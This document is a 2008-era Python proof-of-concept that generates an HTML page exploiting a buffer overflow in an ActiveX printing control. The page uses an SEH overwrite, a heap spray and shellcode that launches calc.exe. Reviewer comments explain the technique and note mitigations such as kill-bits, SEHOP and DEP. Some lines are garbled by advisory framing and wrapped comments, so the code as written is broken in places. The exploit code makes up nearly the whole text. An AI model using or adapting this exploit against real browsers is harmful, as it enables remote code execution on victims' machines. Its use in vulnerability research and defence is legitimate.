21 August, 2008
# Writes WePO-PoC.html: a page that instantiates the ActiveX control named by
# the CLSID/codebase in the OBJECT tag below, hands it an oversized "mainurl"
# parameter, and then runs a script that heap-sprays the address the
# overwritten SEH record points to before triggering the control.
# NOTE(review): the leading "/-----------" on the next line is the advisory's
# framing fused onto the first statement; as written that line is not valid
# Python. The "~ " prefixes inside the HTML/JS fragments likewise look like a
# mail-quoting or extraction artifact rather than part of the original markup
# (they are emitted verbatim into the file) — confirm against the source.
# NOTE(review): this is Python 2 era code. The file is opened in text mode
# ('w'); under Python 3, chr(0xFF)/chr(0x0C) are str code points and the
# write() encodes them with the platform default codec (0xFF becomes, e.g.,
# two bytes under UTF-8), so the emitted byte pattern would differ.
/-----------malicioushtml = open('WePO-PoC.html','w')
# Static page head, written first so the OBJECT tag ends up inside <body>.
header = '''
<html>
<head><title>WePO Buffer Overflow PoC</title>
</head>
<body>
'''
malicioushtml.write(header)
# OBJECT tag for the control. The CLSID and codebase URL identify the
# component; id="botontrigger" is what the script at the bottom calls
# .Click() on. Defender note: a kill-bit (IE Compatibility Flags) set on this
# CLSID prevents the control from loading, which neutralises the page.
objeto = '''
<OBJECT
~ classid="clsid:4CE8026D-5DBF-48C9-B6E9-14A2B1974A3D"
~
codebase="http://www.anzio.com/controls30/printwizocx.cab#version=3,0,0,0"
~ width=0
~ height=0
~ align=center
~ hspace=0
~ id="botontrigger"
|
'''
malicioushtml.write(objeto)
# The "mainurl" value is 0x188 filler bytes, 4 bytes of 0xFF (the author's
# end-of-SEH-chain marker) and 4 bytes of 0x0C, so the handler pointer becomes
# 0x0C0C0C0C — the same address the heap spray below fills. SEHOP validates
# the handler chain and DEP/NX keeps the sprayed heap non-executable; either
# defeats this technique independently of the underlying bug.
craftedparam = '<param name="mainurl" value="'
craftedparam += 'A' * 0x188 #0x188 padding bytes to fill the buffer
craftedparam += chr(0xFF) * 4 #indicates the end of SEH Chain
craftedparam += chr(0x0C) * 4 #overwrite the SEH, new value will be
0x0C0C0C0C  # wrapped tail of the comment above; a bare literal is a no-op statement
craftedparam += '">'
malicioushtml.write(craftedparam)
# Remaining parameters, the closing OBJECT tag and the heap-spray script.
# The unescape()d payload, read as little-endian bytes, contains the strings
# "kernel32.dll", "WinExec", "calc.exe" and "ExitProcess", so it appears to
# just launch calc.exe. It calls through the fixed addresses 0x0040108c and
# 0x00401030, which look like the import table of whatever program it was
# assembled in — presumably a test harness, so probably not portable as
# written; TODO confirm by decoding.
# The spray allocates (0x0c0c0c0c + 0x100000) / 0x100000 (~194) blocks of
# 1 MiB, each a 0x90 slide followed by the payload, so that 0x0C0C0C0C lands
# inside a slide; document.botontrigger.Click() then exercises the control.
# Detection note: an unusual CLSID, a near-empty page body, a long "%u"
# string and a ~200-iteration loop concatenating 1 MiB strings is the
# classic heap-spray signature.
jscode = '''
~ <param name="caption" value="Rompete">
~ <param name="Cancel" value="0">
~ <param name="Default" value="0">
~ <param name="DragCursor" value="-12">
~ <param name="DragMode" value="0">
~ <param name="Enabled" value="-1">
~ <param name="Font" value="MS Sans Serif">
~ <param name="Visible" value="-1">
~ <param name="DoubleBuffered" value="0">
~ <param name="Cursor" value="0">
~ <param name="licensecode" value>
~ <param name="printersetup" value="1">
~ <param name="printername" value="printer">
~ <param name="charset" value="UTF-8">
~ <param name="debug" value="0">
~ <param name="initfile" value>
~ <param name="orientation" value>
~ <param name="duplex" value>
~ <param name="fontname" value>
~ <param name="overlay" value>
~ <param name="bitmap" value>
~ <param name="preview" value="0">
~ <param name="faxnum" value>
~ </OBJECT>
<script>
~ var shellcode =
unescape("%u0de8%u0000%u6b00%u7265%u656e%u336c%u2e32%u6c64%u006c%u15ff%u108c%u0040%uf08b%u08e8%u0000%u5700%u6e69%u7845%u6365%u5600%u15ff%u1030%u0040%uec81%u0400%u0000%u016a%u09e8%u0000%u6300%u6c61%u2e63%u7865%u0065%ud0ff%u0ce8%u0000%u4500%u6978%u5074%u6f72%u6563%u7373%u5600%u15ff%u1030%u0040%u006a%ud0ff");
~ var spraySlide = unescape("%u9090%u9090");
~ var heapSprayToAddress = 0x0c0c0c0c;
~ function getSpraySlide(spraySlide, spraySlideSize)
~ {
~ while (spraySlide.length*2<spraySlideSize)
~ {
~ spraySlide += spraySlide;
~ }
~ spraySlide = spraySlide.substring(0,spraySlideSize/2);
~ return (spraySlide);
~ }
~ var heapBlockSize = 0x100000;
~ var SizeOfHeapDataMoreover = 0x5;
~ var payLoadSize = (shellcode.length * 2);
~ var spraySlideSize = heapBlockSize - (payLoadSize +
SizeOfHeapDataMoreover);
~ var heapBlocks = (heapSprayToAddress+heapBlockSize)/heapBlockSize;
~ var memory = new Array();
~ spraySlide = getSpraySlide(spraySlide,spraySlideSize);
~ for (i=0;i<heapBlocks;i++)
~ {
~ memory[i] = spraySlide + shellcode;
~ }
~ document.botontrigger.Click();
</script>
</body>
</html>
'''
malicioushtml.write(jscode)
# NOTE(review): the handle is not managed by a `with` block, so it stays open
# if any write above raises.
malicioushtml.close()
- -----------/
